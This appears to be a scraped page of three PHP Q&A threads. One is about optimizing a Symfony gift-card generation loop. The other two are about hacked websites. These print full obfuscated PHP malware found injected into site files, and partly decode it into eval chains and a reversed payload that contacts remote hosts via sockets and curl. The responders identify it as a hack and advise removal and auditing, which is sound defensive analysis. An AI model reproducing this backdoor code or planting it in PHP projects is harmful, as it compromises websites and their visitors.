We Keep Coding

code needs to loop over minimum 2000 times in php foreach

I am having the foreach loop that will run minimum 2000 loops
foreach ($giftCardSchemeData as $keypreload => $preload) {
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$cardnumber = self::getCardNumber();
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card" ;
$giftCardSchemeDataDb = array('preload' => array('value' => $preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' => $cardexistencetype, 'isgiftcard' => true , 'giftcardamount' => $preload['value'],'giftCardSchemeData' => json_encode($giftCardSchemeDataDb), 'expirymonths' => $preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' => null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null, 'pinnumber' => mt_rand(100000,999999));
$output = array_merge($data, $otherdata);
// var_dump($output);
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Like above foreach I am having totally 5 of them. When I call the function each time the 5 foreach runs and then return the response. It take more time and the php maximum execution time occurs.
Is there a any way to send the response and then we could run the foreach in server side and not creating the maximum execution time issue.Also need an optimization for the foreach.
Also In symfony I have tried the try catch method for the existence check in the above code it return the Entity closed Error. I have teprorily used the existence check in Db but need an optimization

There seems to be a lot wrong (or to be optimized) with this code, but let's focus on your questions:
First I think this code shouldn't be in code that will be triggered by a visitor.
You should seperate 2 processes:
1. A cronjob that runs that will generate everything that must be generated and saved that generated info to a database. The cronjob can take as much time as it needs. Look at Symfony's console components
2. A page that displays only the generated info by fetching it from the database and passing it to a Twig template.
However, looking at the code you posted I think it can be greatly optimized as is. You seem to have a foreach loop that fetches variable data, and in that you have a for-loop that does not seem to generate much variability at all.
So most of the code inside the for loop is now being executed over and over again without making any actual changes.
Here is a concept that would give much higher performance. Ofcourse since I don't know the actual context of your code you will have to "fix it".
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card";
foreach ($giftCardSchemeData as $keypreload => $preload) {
$cardnumber = self::getCardNumber();
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
$giftCardSchemeDataDb = array('preload' => array('value' =>
$preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' =>
$cardexistencetype, 'isgiftcard' => true , 'giftcardamount' =>
$preload['value'],'giftCardSchemeData' =>
json_encode($giftCardSchemeDataDb), 'expirymonths' =>
$preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' =>
null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null,
'pinnumber' => 0);
$output = array_merge($data, $otherdata);
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$output['pinnumber'] = mt_rand(100000,999999);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Also: if in this code you are triggering any database inserts or updates, you don't want to trigger them each iteration. You will want to start some kind of database transaction and flush the queries each X iterations instead.

What does this piece of code mean in PHP?

Upon updating a PHP website, I came across this piece of code.
It doesn't make any sense.
What could be this??
An attack on website or something???
<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) && (!strstr($ua, "\x72\166\x3a\61\x31")) && (!strstr($ua, "\x61\156\x64\162\x6f\151\x64")) && (!strstr($ua, "\x6d\157\x62\151\x6c\145")) && (!strstr($ua, "\x69\160\x68\157\x6e\145")) && (!strstr($ua, "\x69\160\x61\144")) && (!strstr($ua, "\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
} ?><?php
$vwxsajnbcm = 'sfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%y74]273]y76]252]y85]256]y6g]257]y86]267]y7x5c%x78257UFH#%x5c%x78!)%x5c%x7825z>>2*!%x5c256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUf+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;tn+qsvmt+fmhpph#)zbssb!-#}#)fep5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gp25kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y4]275]y7:]268]y7f#<!%<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cj0#!%x5c%x782f!**#sfmcnbs+yfeoSFSFGFS%x5c%x7860QUUI&c_UOFHBuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x787825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%vg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%if((function_exists("%x6f%142%x5f%1!<##!>!2p%x5c%x7825!|!*85c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5x7825rN}#QwTW%x5c%x7825hIr%x%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x7825nfd)##Qtpz)#]341]88M4P8]35c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x78>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xb%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<*65]y31]55]y85]82]y76]62]y3:]84#-:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctu,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52976]258]y6g]273]y76]271])-1);} #error_reporting(0); preg_replace("%x2f%50%x2e%52273]y76]258]y6g]273]y76]271]y7d]252%x7822:ftmbg39*56A:>:#+I#)q%x5c%x7825:>:r%x5c%x78255%x5c%x785cSFWSFT%x5c%x>%x5c%x782272qj%x5c%x5c%x7825)7gj6<*id%xx5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x7f_*#fubfsdXk5%x5c%x7860<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdx7825iN}#-!tussfw)%x5c%x78h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7826-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#%x5c%x782fq%x5c%x7825>U<#16pjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%xy72]265]y39]274]y85]273]y6gx5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%sfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7875c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x784]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c]248L3P6L1M5]D2P4]D6#<%x5c%x77827K6<%x5c%x787fw6*3qj%x5c%x78257{66~6<&w6<%x5c%x787fw6*CW&)7#)tutjyf%x5c%x7860opjudo7825:-5ppde:4:|:**#ppde#)tutjyf%5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946OSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%%x5c%x782f},;#-#}+;%s)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x6:!}7;!}6;##}C;!>>!}W;utpi}Y;7]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_bz+sfwjidsb%x5c%x7860bj+upco6057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k825=*h%x5c%x7825)m%x5c)))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg(pmpusut)tpqssutRe%x5c%x7825)Rd%x#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x78osvufs}w;*%x5c%x787f!>>%x5c%x75c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x78!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x782x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782]81#%x5c%x782f#7e:5594%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvrf{jt)!gj!<*2bd%x5c%x7825-#1G8X6<#o]o]Y%x5c%x78257;5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x%x5c%x7824<%x5c%x78e%x5c%x7%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z#%x5c%x785cq%x5c%x78257%x5c%x782f7###7%x5c%x782f7^#iubq#%xy7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7820hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787863%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#8{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3>2b%x5c%x7825!<*qp%x5c%x71*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x76*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78y<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825b825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]567860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x7824-%x5c%x7824-!%utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%25!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgAmqnj!%x5c%x782f!#0#)idubn%x5c%x786x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78{hnpd!opjudovg!|!**#j{hnpd]452]88]5]48]32M3]317]445]212]4tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;5tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5P6]36]73]83]238M7]381]211M5]67%x7825j,,*!|%x5c%x7824-55%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e27rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!ds822!pd%x5c%x7825)!gj}Z;h!o:|:**t%x5c%x7825)m%x5c%x7!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*Xbek!~!<b%x5c%x7825%x5c%x787f!5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x52]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]!%x5c%x7825mm!>!#]y81]%x7825:osvufs:~:<*9-1-r%x5c%x782y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7O%x5c%x7822#)fepmqyfAW~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tus%x7825):fmji%x5c%x7878:<##:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fu*qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j8Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878825>j%x5c%x7825!<**3-!OVMM*<%x22%51%x29%51%x29%73", NULL); }c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%xx5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfic%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]5!tus%x5c%x7860sfqmbdf)%x5c%x7%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<%x29%57%x65","%x65%166%x61%154%x2T-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x%x5c%x7825)utjm!|!*5!%x5c%x7827j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D68b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x78d>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c24Ypp3)%x5c%x7825cB%x5c%AZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,7u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7825G]y6d]281Ld]245]K2]285]!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%xc%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%xKe]53Ld]53]Kc]55Ld]55#*5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{7*&7-n%x5c%x7825)utjm6<%x5c%x787fwx7825>j%x5c%x7825!*3!%x5c%x7827x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%xy81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j1]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x782%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x5c%x7825)+opjudovg+)!gj+{e%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f]273]y76]271]y7d]252]7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#bmgoj{h1:|:*mmvo:>:iuhofm%x5c%x%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|:!ftmf!}Z;^nbsbq%x5c%x782q%x5c%x7825}U;y]}R;2]},;osvufs}24)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~8%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%1y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]256<pd%x5c%x7825w6Z6<.3%&;ftmbg}%x5c%x787f;!%x5c%x7860ufldpt}X;%x5c%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd7]278]225]241]334]368]322]3]364]6]283]427]36]373x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj5-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x78&w6<%x5c%x787fw6*CW&)7gj6<.[A%x827&6<*rfs%x5c%x78257-K)fujs%x5c%x7872-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>25c*W%x5c%x7825eN+#Qi%x5c%x75c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**5)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]2%x5c%x7827doj%x5c%x78256<%x45]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*W~%x5c%x7824<!%x5c%x7825o:!>D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D21%76%x21%50%x5c%x7825$n){return chr(ord($nc%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg/(.*)/epreg_replacewehsderyhp';
$ocskvyfdqx = explode(chr((235 - 191)) , '818,35,4175,64,3243,58,10019,21,1481,56,7033,33,9024,59,5326,57,1686,59,9997,22,6700,49,9235,48,957,43,2373,61,9124,24,3546,52,6656,44,4065,66,7902,34,4455,34,3502,44,7578,38,9473,37,3774,22,4735,58,84,22,5432,56,3405,49,6749,60,2571,34,1646,20,9331,57,3678,68,3923,58,7256,68,6588,68,530,48,1084,48,1745,24,2605,28,4959,49,9839,27,9193,42,8579,38,1666,20,5865,57,128,44,2749,63,6984,49,9442,31,7851,51,2900,29,5164,55,9168,25,2180,68,230,39,5601,37,9148,20,3375,30,5550,26,2057,49,9739,38,9580,67,7936,31,6407,67,3598,58,9388,54,6122,48,6528,21,7155,52,7124,31,7642,45,9510,70,8087,65,5107,26,2633,24,780,38,8351,44,300,44,3746,28,6170,21,4386,25,4548,64,8617,42,2472,70,6944,40,4025,40,8971,53,853,23,4297,38,578,30,3156,28,269,31,5008,34,4131,44,3301,32,2689,60,1270,42,3112,44,608,29,3874,49,5703,29,425,52,1170,68,6317,48,3184,37,8812,25,1623,23,8680,60,2812,20,6809,64,7427,68,1572,21,6256,61,8740,31,2657,32,8524,55,8495,29,6083,39,1132,38,4664,47,5638,65,7519,59,2029,28,1359,45,2991,52,637,40,4335,51,8837,31,8771,41,3454,48,5042,65,4793,69,5922,55,2106,27,8659,21,6031,52,8206,63,9083,41,42,42,404,21,2133,47,5999,32,9777,62,2929,62,1593,30,5576,25,3221,22,6227,29,1846,69,4612,52,5796,69,9923,27,6365,42,5977,22,1537,35,8305,46,4711,24,724,56,1312,47,2832,68,1029,55,6915,29,677,47,477,53,5303,23,8449,46,8395,54,5488,62,4239,58,8929,42,6873,42,8152,54,7495,24,1820,26,9711,28,876,53,2314,59,6474,54,6191,36,2248,66,929,28,7207,49,1915,70,5219,54,4862,47,1404,54,5383,49,3656,22,1985,44,7324,34,4909,50,9950,47,2434,38,2542,29,7616,26,7828,23,1769,51,4489,59,7066,58,1000,29,9283,48,5273,30,5133,31,9866,57,0,42,7967,50,3796,51,5732,64,9647,64,4411,44,7752,37,8269,36,7789,39,7687,65,10040,66,106,22,3043,69,3847,27,7358,69,8868,61,3333,42,344,60,1458,23,3981,44,172,58,8017,70,1238,32,6549,39');
$niqesrdxdn = substr($vwxsajnbcm, (32536 - 22430) , (34 - 27));
if (!function_exists('zzrfhvkcwo'))
{
function zzrfhvkcwo($znzwjxpcyc, $lfafkymhqq)
{
$xnhcrqpkcp = NULL;
for ($gznncvjdur = 0; $gznncvjdur < (sizeof($znzwjxpcyc) / 2); $gznncvjdur++)
{
$xnhcrqpkcp.= substr($lfafkymhqq, $znzwjxpcyc[($gznncvjdur * 2) ], $znzwjxpcyc[($gznncvjdur * 2) + 1]);
}
return $xnhcrqpkcp;
};
}
$zwqshkkfti = "\x20\57\x2a\40\x6b\170\x70\153\x66\170\x64\171\x64\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x32\55\x31\64\x35\51\x29\54\x20\143\x68\162\x28\50\x34\65\x30\55\x33\65\x38\51\x29\54\x20\172\x7a\162\x66\150\x76\153\x63\167\x6f\50\x24\157\x63\163\x6b\166\x79\146\x64\161\x78\54\x24\166\x77\170\x73\141\x6a\156\x62\143\x6d\51\x29\51\x3b\40\x2f\52\x20\144\x76\155\x63\147\x72\163\x76\153\x68\40\x2a\57\x20";
$fqlqhefvbx = substr($vwxsajnbcm, (52826 - 42713) , (57 - 45));
$fqlqhefvbx($niqesrdxdn, $zwqshkkfti, NULL);
$fqlqhefvbx = $zwqshkkfti;
$fqlqhefvbx = (686 - 565);
$vwxsajnbcm = $fqlqhefvbx - 1; ?>

Yes. It's a hack. The randomly-generated variable names, etc. both obfuscate the content and make it less easy to search for using scanners—the code will do the same thing, but using different variable names, etc., on each site, so you can't just search for specific strings to find it. Here's another example of what looks like the same hack.
You should remove the code, but of course that won't remove whatever vulnerability allowed the hacker to put it there in the first place, so you need to audit the site and fix that, too. That's way beyond the scope of an answer here, and off-topic for Stack Overflow, too. (You may have more luck on http://security.stackexchange.com, but check their help centre before posting...)
Is this a WordPress website, too? I'd carefully follow all the advice in FAQ "My Site Was Hacked".

Hacked site - encrypted code

Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code do or how to decode it?

You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj 